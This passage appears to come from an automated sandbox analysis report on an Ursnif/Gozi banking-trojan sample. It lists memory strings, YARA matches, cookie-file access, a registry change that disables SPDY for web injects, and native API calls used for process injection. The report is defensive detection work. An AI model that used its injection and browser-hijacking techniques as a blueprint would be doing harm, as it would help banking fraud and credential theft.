Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4544, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_03125ECA
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	0_2_03125ECA
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_03125ECA

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4544, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031447A1 NtMapViewOfSection,	0_2_031447A1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031237E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_031237E7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03127E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_03127E14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03137AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_03137AFF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313CD7A NtQueryInformationProcess,	0_2_0313CD7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03137579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	0_2_03137579
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03129DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_03129DAC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312E010 GetProcAddress,NtCreateSection,memset,	0_2_0312E010
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_0312A027
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_0313AC94
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03136CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_03136CBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_0312ACD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312AA15 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_0312AA15
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03131606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_03131606
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_0313956E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0314298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_0314298D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031245FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_031245FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03127878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_03127878
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03134C67 NtGetContextThread,RtlNtStatusToDosError,	0_2_03134C67
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031340A7 memset,NtQueryInformationProcess,	0_2_031340A7
Source: C:\Windows\System32\control.exe	Code function: 35_2_008040A4 NtQueryInformationProcess,	35_2_008040A4
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FF0D0 NtReadVirtualMemory,	35_2_007FF0D0
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F1084 NtQueryInformationProcess,	35_2_007F1084
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E1148 NtCreateSection,	35_2_007E1148
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_0080D9EC
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	35_2_007E69DC
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EB980 NtMapViewOfSection,	35_2_007EB980
Source: C:\Windows\System32\control.exe	Code function: 35_2_00801DF4 NtWriteVirtualMemory,	35_2_00801DF4
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	35_2_007E7DA0
Source: C:\Windows\System32\control.exe	Code function: 35_2_008046EC NtAllocateVirtualMemory,	35_2_008046EC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00821002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_00821002
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F81084 NtQueryInformationProcess,	37_2_0000029741F81084
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	37_2_0000029741F9D9EC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741FB1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	37_2_0000029741FB1002

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_03129781 CreateProcessAsUserW,

0_2_03129781

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312E384	0_2_0312E384
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03138BF3	0_2_03138BF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03143EAF	0_2_03143EAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031262FA	0_2_031262FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313ED4B	0_2_0313ED4B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03124C03	0_2_03124C03
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313D057	0_2_0313D057
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312D0DC	0_2_0312D0DC
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E69DC	35_2_007E69DC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00804B78	35_2_00804B78
Source: C:\Windows\System32\control.exe	Code function: 35_2_00805428	35_2_00805428
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F9850	35_2_007F9850
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F782C	35_2_007F782C
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FB814	35_2_007FB814
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FA0F0	35_2_007FA0F0
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080A074	35_2_0080A074
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E596C	35_2_007E596C
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FD92C	35_2_007FD92C
Source: C:\Windows\System32\control.exe	Code function: 35_2_008019FC	35_2_008019FC
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080A9FC	35_2_0080A9FC
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F99F8	35_2_007F99F8
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EB9E8	35_2_007EB9E8
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E49C4	35_2_007E49C4
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EDA3C	35_2_007EDA3C
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E2A34	35_2_007E2A34
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E9A34	35_2_007E9A34
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FAA28	35_2_007FAA28
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F7218	35_2_007F7218
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080E220	35_2_0080E220
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080EA40	35_2_0080EA40
Source: C:\Windows\System32\control.exe	Code function: 35_2_00806250	35_2_00806250
Source: C:\Windows\System32\control.exe	Code function: 35_2_0081027C	35_2_0081027C
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FB378	35_2_007FB378
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080A3B2	35_2_0080A3B2
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E7B44	35_2_007E7B44
Source: C:\Windows\System32\control.exe	Code function: 35_2_008003EC	35_2_008003EC
Source: C:\Windows\System32\control.exe	Code function: 35_2_008093FC	35_2_008093FC
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F6B00	35_2_007F6B00
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F1C0C	35_2_007F1C0C
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EECE0	35_2_007EECE0
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EFCA0	35_2_007EFCA0
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F6528	35_2_007F6528
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E65D8	35_2_007E65D8
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F75D8	35_2_007F75D8
